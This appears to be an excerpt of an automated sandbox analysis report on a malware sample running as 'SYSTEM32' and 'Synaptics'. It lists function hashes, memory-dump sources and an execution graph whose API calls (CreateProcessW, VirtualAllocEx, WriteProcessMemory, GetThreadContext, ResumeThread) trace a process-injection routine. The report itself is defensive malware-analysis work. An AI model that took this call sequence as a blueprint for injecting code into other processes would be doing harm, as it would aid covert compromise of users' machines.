                                                    • Opcode ID: 7baddbc0d9a8e60f08372b8fc0406ce4af0d9d3e7dc7bca58d7bde4639425b44
                                                    • Instruction ID: 0a8dbf21e44114a46f1f58eea1ba4d27957caa7be3be3ca7cc4b4715a38b5d4f
                                                    • Opcode Fuzzy Hash: 7baddbc0d9a8e60f08372b8fc0406ce4af0d9d3e7dc7bca58d7bde4639425b44
                                                    • Instruction Fuzzy Hash: 6B01D2B4A063588FCF16DB69D8607AB3BBAAF06344F0A009DC909D7742C7349900CF92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA0AC8 Relevance: .3, Instructions: 252COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dd65fe21259b0346d1cb74f460d4beae790454ae257a1b267741eea9c371f27f
                                                    • Instruction ID: c343e5de99ddae0d7c04742025827456e7cf4d0fadaf1ed4f731ac59890c196b
                                                    • Opcode Fuzzy Hash: dd65fe21259b0346d1cb74f460d4beae790454ae257a1b267741eea9c371f27f
                                                    • Instruction Fuzzy Hash: 5191D370B002089FCB15DBB8D454AAEBBF6AF89744F1485AAD406DB761CF74DC06CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA0920 Relevance: .1, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0cc8dac770063b81e8e78b78f37ea26d192737fd6b20f01ef50dd589c31e461c
                                                    • Instruction ID: 6e272e0082983127d3b499a6d48183133ac2aff4ac26a2333acfac1d1e12fd74
                                                    • Opcode Fuzzy Hash: 0cc8dac770063b81e8e78b78f37ea26d192737fd6b20f01ef50dd589c31e461c
                                                    • Instruction Fuzzy Hash: 7541BF70B042049FDB15DB68D464BAEBBF6EF89248F1484A9D106DB3A1CB75DC09CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA06A0 Relevance: .1, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3b659454fb86d7bddca51c46103b2277eb2ddea4a71e147ce9ff15b323da0a85
                                                    • Instruction ID: 55a7388e30feff85cab78dd6898bf6017ec7c7fbaf50ef8847d2828a03fedb15
                                                    • Opcode Fuzzy Hash: 3b659454fb86d7bddca51c46103b2277eb2ddea4a71e147ce9ff15b323da0a85
                                                    • Instruction Fuzzy Hash: A451C630601319CFCB65EF75E1488997767FB863097508969D812CB278EB39ED86CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA06B0 Relevance: .1, Instructions: 113COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 070cc68e9f950c0ca5d5834be4407ed48e8b0442bc79f20b8dbb180bc3add99a
                                                    • Instruction ID: 72e9b7ae4072a48f1afc46bcc4b46950a400dc4c6d469488f3a0d2d31ce2251f
                                                    • Opcode Fuzzy Hash: 070cc68e9f950c0ca5d5834be4407ed48e8b0442bc79f20b8dbb180bc3add99a
                                                    • Instruction Fuzzy Hash: 8E51B530601319CFCB65EF79E1488997767FB863097508929D812CB278EB39ED86CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA0AB8 Relevance: .1, Instructions: 109COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7b91c79e16204e00a0c88a735e56ae307a44d95c7b70af39e57be2481d751729
                                                    • Instruction ID: 0a3f8813bfd76402073fee295eab9a1a34cd4ea6a447447a63b6f52985b2aa54
                                                    • Opcode Fuzzy Hash: 7b91c79e16204e00a0c88a735e56ae307a44d95c7b70af39e57be2481d751729
                                                    • Instruction Fuzzy Hash: 6A417C70B101149FD714DB68D498A5EBBF6AF89714F1580A9E806DB3B1CF71EC01CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA0910 Relevance: .1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 66270a0f81291d1581a94134e64a11b1928bffa7bda9a33092f5cf8145e744ee
                                                    • Instruction ID: caf5344ffc4155d62636defabb04d7adab1f7811854f4456638ec0a6bf1fbeb4
                                                    • Opcode Fuzzy Hash: 66270a0f81291d1581a94134e64a11b1928bffa7bda9a33092f5cf8145e744ee
                                                    • Instruction Fuzzy Hash: E331B071A002089FDB15DF68C464B9EBBF6BF89304F1484ADD501AB771CB759C45CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA0F3B Relevance: .1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dcf64448ebc35cbe75c9d93365638388ae8f76179e6a1746c1e5517169ae541b
                                                    • Instruction ID: 1653e39ac5c92ae5a4272f5d29469a38ddf26f7fba22fb3927082471a3f9fc7f
                                                    • Opcode Fuzzy Hash: dcf64448ebc35cbe75c9d93365638388ae8f76179e6a1746c1e5517169ae541b
                                                    • Instruction Fuzzy Hash: 9E31CE70F012159FCB44EB789851AAE7BF6EF89208B1400BDE145DB361EF34DC058B92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA0F48 Relevance: .1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 46ab2494e90b2aebe6116041a165aa1bff393687ee2f0f6b6e93a06538ee354a
                                                    • Instruction ID: e8d332072e7a30bf4449c7b918865ad4c17379ed3ff09cbcbdf7597659941f14
                                                    • Opcode Fuzzy Hash: 46ab2494e90b2aebe6116041a165aa1bff393687ee2f0f6b6e93a06538ee354a
                                                    • Instruction Fuzzy Hash: 2F21AD70F002158FCB54EB789850AAEBBF6EF89208B14447DE646DB360EF34DC058B92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA0598 Relevance: .1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8b4765a82a2e6cefe7719f98ff66815a0553bbe7a3e53381282bd49ef4b6e6d7
                                                    • Instruction ID: 4f550e08080065c35fea726a8e83c0859a1da76af0e425712f1eb9a4e529c34b
                                                    • Opcode Fuzzy Hash: 8b4765a82a2e6cefe7719f98ff66815a0553bbe7a3e53381282bd49ef4b6e6d7
                                                    • Instruction Fuzzy Hash: B7215EB1F013569FDB695B79B56876E3BA9AB84389F04002DE903C6340DF24C845CF92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA0E48 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: df08b36644626f45efebadfa7d82a4bca32d6a7f0d984087cface90cd87d7004
                                                    • Instruction ID: a7fdfe514fbdec3d7a7ce77b42305ac007ed4d88d41b44a5b0e7d51a097dba24
                                                    • Opcode Fuzzy Hash: df08b36644626f45efebadfa7d82a4bca32d6a7f0d984087cface90cd87d7004
                                                    • Instruction Fuzzy Hash: 8311AFA0B002189BDB18ABFC58146AFB5DEDFD9248F00453DD40AD7B94DF349C0647E2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA05A8 Relevance: .1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c5ced16c31f83a998317cbbba1ca63b750f71194833ba522f982f7ce1cf7886
                                                    • Instruction ID: 3388a8bcdd979c4e54669db93d15967021960668eb197fc007b249a5421a3f48
                                                    • Opcode Fuzzy Hash: 1c5ced16c31f83a998317cbbba1ca63b750f71194833ba522f982f7ce1cf7886
                                                    • Instruction Fuzzy Hash: 042124B1B013258FDB686B79F56876E36A9AF44389F04042DDA56C6744DF34C444CF92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA0A3D Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4262b31d13680dd9d721758afc0b98f710c3900321245a560c7c54def14628ea
                                                    • Instruction ID: 86e04d9698248247a2d8c0da6818da39ac35108eff5ec72c89a103becdb0f3ce
                                                    • Opcode Fuzzy Hash: 4262b31d13680dd9d721758afc0b98f710c3900321245a560c7c54def14628ea
                                                    • Instruction Fuzzy Hash: 940186347093905FC717A37958245AE7FE69FCB19831544EAD146CF7A3CE15CC0A87A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA16B0 Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 26991dff4b422d7ced602ba9be54ef99ab59426f6ebfc243dfc4ca04b8d2e3a8
                                                    • Instruction ID: 89e35b0d184f1c4261afbdaf23fb9c3faf73c6695aeb56f0e981dff7a845c2f0
                                                    • Opcode Fuzzy Hash: 26991dff4b422d7ced602ba9be54ef99ab59426f6ebfc243dfc4ca04b8d2e3a8
                                                    • Instruction Fuzzy Hash: 0CF069B4A012198FDB18EBA9D4607AF77AAAF04784F06006DCA19D7741DB349940CF92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA068F Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 12a2e9efbc4f8126a18e0cce86219ad849d0bcc2622c678721942241b58022d4
                                                    • Instruction ID: 35758e3175e6fa6298db0a46d3c31db6ed9638d020b6bee411baed9370b1e248
                                                    • Opcode Fuzzy Hash: 12a2e9efbc4f8126a18e0cce86219ad849d0bcc2622c678721942241b58022d4
                                                    • Instruction Fuzzy Hash: B5C012A8509316CED73427A8A128BAC2A299B90388F000048B28248B988F3408008FA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02FA0673 Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a753e12282109af703185a7333a2fd4775db1d85de58fde13f1eac01735cb08f
                                                    • Instruction ID: b5b276a93691b5bb2eacc4f34c892f17ab5322de159b675b6ee29dc17bbb58dd
                                                    • Opcode Fuzzy Hash: a753e12282109af703185a7333a2fd4775db1d85de58fde13f1eac01735cb08f
                                                    • Instruction Fuzzy Hash: 02C012A8509356CADB3417A8A128BAC3A299790388F000049B24244A948F2408008F52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:9.4%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:214
                                                    Total number of Limit Nodes:15
                                                    execution_graph 37184 15db878 DuplicateHandle 37185 15db90e 37184->37185 37186 15dfcb8 37187 15dfd20 CreateWindowExW 37186->37187 37189 15dfddc 37187->37189 37282 15d9168 37283 15d9169 37282->37283 37286 15d9260 37283->37286 37284 15d9177 37287 15d9273 37286->37287 37288 15d9283 37287->37288 37291 15d98f0 37287->37291 37295 15d98e0 37287->37295 37288->37284 37292 15d9904 37291->37292 37294 15d9929 37292->37294 37299 15d9450 37292->37299 37294->37288 37296 15d9904 37295->37296 37297 15d9450 LoadLibraryExW 37296->37297 37298 15d9929 37296->37298 37297->37298 37298->37288 37300 15d9ad0 LoadLibraryExW 37299->37300 37302 15d9b49 37300->37302 37302->37294 37303 15d9848 37304 15d988a 37303->37304 37305 15d9890 GetModuleHandleW 37303->37305 37304->37305 37306 15d98bd 37305->37306 37307 6051f50 37308 6051f62 37307->37308 37309 6051f78 37308->37309 37311 6051fa3 37308->37311 37312 6051fc6 37311->37312 37314 6051fe5 37311->37314 37313 6051fe1 37312->37313 37317 6052130 FindCloseChangeNotification 37312->37317 37319 6052128 37312->37319 37313->37309 37314->37309 37318 605218a 37317->37318 37318->37313 37320 6052130 FindCloseChangeNotification 37319->37320 37321 605218a 37320->37321 37321->37313 37322 60511b0 37323 605133b 37322->37323 37324 60511d6 37322->37324 37324->37323 37329 15dff00 SetWindowLongW 37324->37329 37331 15dfef8 SetWindowLongW 37324->37331 37333 6051429 37324->37333 37336 6051430 PostMessageW 37324->37336 37330 15dff6c 37329->37330 37330->37324 37332 15dff6c 37331->37332 37332->37324 37334 6051430 PostMessageW 37333->37334 37335 605149c 37334->37335 37335->37324 37337 605149c 37336->37337 37337->37324 37338 60503f0 37340 60503a2 37338->37340 37342 60503f3 37338->37342 37339 605035a 37340->37339 37345 60507d8 37340->37345 37350 60507c0 37340->37350 37341 60503e3 37346 60507e7 37345->37346 37347 60507fa 37346->37347 37355 6050818 37346->37355 37385 6050828 37346->37385 37347->37341 37351 60507d8 37350->37351 37352 60507fa 37351->37352 37353 6050818 11 API calls 37351->37353 37354 6050828 11 API calls 37351->37354 37352->37341 37353->37351 37354->37351 37356 6050828 37355->37356 37415 6050d40 37356->37415 37419 6050d3c 37356->37419 37357 60508fa 37359 6050bb0 37357->37359 37383 6050f70 GetThreadContext 37357->37383 37384 6050f68 GetThreadContext 37357->37384 37358 605094e 37358->37359 37374 6051020 ReadProcessMemory 37358->37374 37375 6051028 ReadProcessMemory 37358->37375 37359->37346 37360 6050989 37360->37359 37361 6050a0a VirtualAllocEx 37360->37361 37362 6050a4f 37361->37362 37362->37359 37368 60510e2 WriteProcessMemory 37362->37368 37369 605119f WriteProcessMemory 37362->37369 37370 60510e8 WriteProcessMemory 37362->37370 37363 6050b19 37376 60510e2 WriteProcessMemory 37363->37376 37377 605119f WriteProcessMemory 37363->37377 37378 60510e8 WriteProcessMemory 37363->37378 37364 6050a7e 37364->37359 37364->37363 37371 60510e2 WriteProcessMemory 37364->37371 37372 605119f WriteProcessMemory 37364->37372 37373 60510e8 WriteProcessMemory 37364->37373 37365 6050b36 37365->37359 37381 6050f70 GetThreadContext 37365->37381 37382 6050f68 GetThreadContext 37365->37382 37366 6050b6e 37366->37359 37367 6050b76 ResumeThread 37366->37367 37367->37359 37368->37364 37369->37364 37370->37364 37371->37364 37372->37364 37373->37364 37374->37360 37375->37360 37376->37365 37377->37365 37378->37365 37381->37366 37382->37366 37383->37358 37384->37358 37386 60508cc 37385->37386 37406 6050d40 CreateProcessW 37386->37406 37407 6050d3c CreateProcessW 37386->37407 37387 60508fa 37389 6050bb0 37387->37389 37423 6050f70 37387->37423 37427 6050f68 37387->37427 37388 605094e 37388->37389 37431 6051020 37388->37431 37434 6051028 ReadProcessMemory 37388->37434 37389->37346 37390 6050989 37390->37389 37391 6050a0a VirtualAllocEx 37390->37391 37392 6050a4f 37391->37392 37392->37389 37436 60510e2 37392->37436 37440 605119f 37392->37440 37443 60510e8 37392->37443 37393 6050b19 37403 60510e2 WriteProcessMemory 37393->37403 37404 605119f WriteProcessMemory 37393->37404 37405 60510e8 WriteProcessMemory 37393->37405 37394 6050a7e 37394->37389 37394->37393 37398 60510e2 WriteProcessMemory 37394->37398 37399 605119f WriteProcessMemory 37394->37399 37400 60510e8 WriteProcessMemory 37394->37400 37395 6050b36 37395->37389 37408 6050f70 GetThreadContext 37395->37408 37409 6050f68 GetThreadContext 37395->37409 37396 6050b6e 37396->37389 37397 6050b76 ResumeThread 37396->37397 37397->37389 37398->37394 37399->37394 37400->37394 37403->37395 37404->37395 37405->37395 37406->37387 37407->37387 37408->37396 37409->37396 37416 6050dbb CreateProcessW 37415->37416 37418 6050e91 37416->37418 37420 6050d40 CreateProcessW 37419->37420 37422 6050e91 37420->37422 37424 6050fb2 37423->37424 37425 6050fbc GetThreadContext 37423->37425 37424->37425 37426 6050fea 37425->37426 37426->37388 37428 6050f70 GetThreadContext 37427->37428 37430 6050fea 37428->37430 37430->37388 37432 6051028 ReadProcessMemory 37431->37432 37433 60510a8 37432->37433 37433->37390 37435 60510a8 37434->37435 37435->37390 37437 60510e8 WriteProcessMemory 37436->37437 37439 6051173 37437->37439 37439->37394 37441 6051152 WriteProcessMemory 37440->37441 37442 6051173 37441->37442 37442->37394 37444 6051130 37443->37444 37445 6051138 WriteProcessMemory 37443->37445 37444->37445 37446 6051173 37445->37446 37446->37394 37190 15db650 GetCurrentProcess 37191 15db6ca GetCurrentThread 37190->37191 37192 15db6c3 37190->37192 37193 15db707 GetCurrentProcess 37191->37193 37194 15db700 37191->37194 37192->37191 37197 15db73d 37193->37197 37194->37193 37195 15db765 GetCurrentThreadId 37196 15db796 37195->37196 37197->37195 37198 15d40d0 37199 15d40da 37198->37199 37203 15d41c1 37198->37203 37209 15d3c64 37199->37209 37201 15d40f5 37204 15d41c4 37203->37204 37206 15d421e 37204->37206 37213 15d42b1 37204->37213 37217 15d42c0 37204->37217 37206->37199 37210 15d3c6f 37209->37210 37225 15d5184 37210->37225 37212 15d69dd 37212->37201 37215 15d42b4 37213->37215 37214 15d43c4 37214->37214 37215->37214 37221 15d3de4 37215->37221 37219 15d42e7 37217->37219 37218 15d43c4 37218->37218 37219->37218 37220 15d3de4 CreateActCtxA 37219->37220 37220->37218 37222 15d5350 CreateActCtxA 37221->37222 37224 15d5413 37222->37224 37226 15d518f 37225->37226 37229 15d57d8 37226->37229 37228 15d6a7d 37228->37212 37230 15d57e3 37229->37230 37233 15d5808 37230->37233 37232 15d6b5a 37232->37228 37234 15d5813 37233->37234 37237 15d5838 37234->37237 37236 15d6c4a 37236->37232 37239 15d5843 37237->37239 37238 15d739c 37238->37236 37239->37238 37241 15db270 37239->37241 37242 15db278 37241->37242 37243 15db2c5 37242->37243 37246 15db538 37242->37246 37250 15db528 37242->37250 37243->37238 37247 15db545 37246->37247 37249 15db57f 37247->37249 37254 15d9750 37247->37254 37249->37243 37251 15db52c 37250->37251 37252 15db57f 37251->37252 37253 15d9750 LoadLibraryExW 37251->37253 37252->37243 37253->37252 37255 15d975b 37254->37255 37256 15dc278 37255->37256 37258 15d9818 37255->37258 37259 15d9823 37258->37259 37260 15d5838 LoadLibraryExW 37259->37260 37261 15dc2e7 37260->37261 37266 15de03f 37261->37266 37272 15de058 37261->37272 37277 15de068 37261->37277 37262 15dc320 37262->37256 37267 15de04f 37266->37267 37268 15de0a5 37267->37268 37270 15de4e8 LoadLibraryExW 37267->37270 37271 15de4d7 LoadLibraryExW 37267->37271 37268->37262 37269 15de0e5 37269->37262 37270->37269 37271->37269 37273 15de060 37272->37273 37274 15de021 37273->37274 37275 15de4e8 LoadLibraryExW 37273->37275 37276 15de4d7 LoadLibraryExW 37273->37276 37274->37262 37275->37274 37276->37274 37278 15de069 37277->37278 37279 15de0a5 37278->37279 37280 15de4e8 LoadLibraryExW 37278->37280 37281 15de4d7 LoadLibraryExW 37278->37281 37279->37262 37280->37279 37281->37279

                                                    Executed Functions

                                                    Function 06063B60 Relevance: .6, Instructions: 636COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a7accbfea93c7f8fda8416b456d179df4b3cc361001c2c2faa574818c67a1a40
                                                    • Instruction ID: 0564f4393baafb6c5502757437810d199483386f9246febc8a8d216ca12a4ce4
                                                    • Opcode Fuzzy Hash: a7accbfea93c7f8fda8416b456d179df4b3cc361001c2c2faa574818c67a1a40
                                                    • Instruction Fuzzy Hash: 91425F74B00204CFDB59DF69C598A6EBBF6BF88304F5584A9E4069B3A1DB34EC45CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05B0E6B8 Relevance: .6, Instructions: 629COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 13898ecfcf584f8511078b94433119ea14302bae6d4052927b0f3908c6695a9b
                                                    • Instruction ID: 6c15a0f67f316b5297913e874f9fb237282bcc15b781630043325f88b74ffe96
                                                    • Opcode Fuzzy Hash: 13898ecfcf584f8511078b94433119ea14302bae6d4052927b0f3908c6695a9b
                                                    • Instruction Fuzzy Hash: F5424C71A04308CFDB24DF65C548A6ABBFAFF84305F5498A9E0468B6A0DB75F885CF11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 060633F0 Relevance: .5, Instructions: 456COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c7178b7a6487de48e32fd2f2d7af8557b2689fc249eca17b6ad46986b0b62a29
                                                    • Instruction ID: 834009fcfcb7e1c5656e9172f8270b5ab2cbe48d821e7d14956fc072c9c60ce4
                                                    • Opcode Fuzzy Hash: c7178b7a6487de48e32fd2f2d7af8557b2689fc249eca17b6ad46986b0b62a29
                                                    • Instruction Fuzzy Hash: 2C123C75A002458FCB54DF69C588AAABBF6FF88314B59C4A9E449DB362C730EC45CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06061268 Relevance: .4, Instructions: 409COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8bb841ef84c43d08fa6a4ca241b98b309efcedaad3595dfbc66f19d1a157f0aa
                                                    • Instruction ID: dfbb3ebb2c0ae6974814688a934afa7b917556d475d4c4944a8433ee3dc8d2ea
                                                    • Opcode Fuzzy Hash: 8bb841ef84c43d08fa6a4ca241b98b309efcedaad3595dfbc66f19d1a157f0aa
                                                    • Instruction Fuzzy Hash: 48024775A40705CFDBA5CF6AC584AAEBBF2BF48300F1489A9E4569B761D734E881CF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015DB640 Relevance: 6.1, APIs: 4, Instructions: 125threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 015DB6B0
                                                    • GetCurrentThread.KERNEL32 ref: 015DB6ED
                                                    • GetCurrentProcess.KERNEL32 ref: 015DB72A
                                                    • GetCurrentThreadId.KERNEL32 ref: 015DB783
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 32a9b59643ef98dccaf434cde00f43b1558c349ba312b179675a4767d93973ae
                                                    • Instruction ID: 44360349afb4ae1b1ddc51cd88df506a7df425d7c6c97bc2654fba98987b4245
                                                    • Opcode Fuzzy Hash: 32a9b59643ef98dccaf434cde00f43b1558c349ba312b179675a4767d93973ae
                                                    • Instruction Fuzzy Hash: 125176B09002499FDB14CFA9DA88BDEBFF5BF49304F248469E009A7360D7345988CB65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 015DB650 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 015DB6B0
                                                    • GetCurrentThread.KERNEL32 ref: 015DB6ED
                                                    • GetCurrentProcess.KERNEL32 ref: 015DB72A
                                                    • GetCurrentThreadId.KERNEL32 ref: 015DB783
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391546980.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_15d0000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: cf4c8f3e2e720974de343dbcf2cb88cf7cd580e9633a44191f71c973235d2285
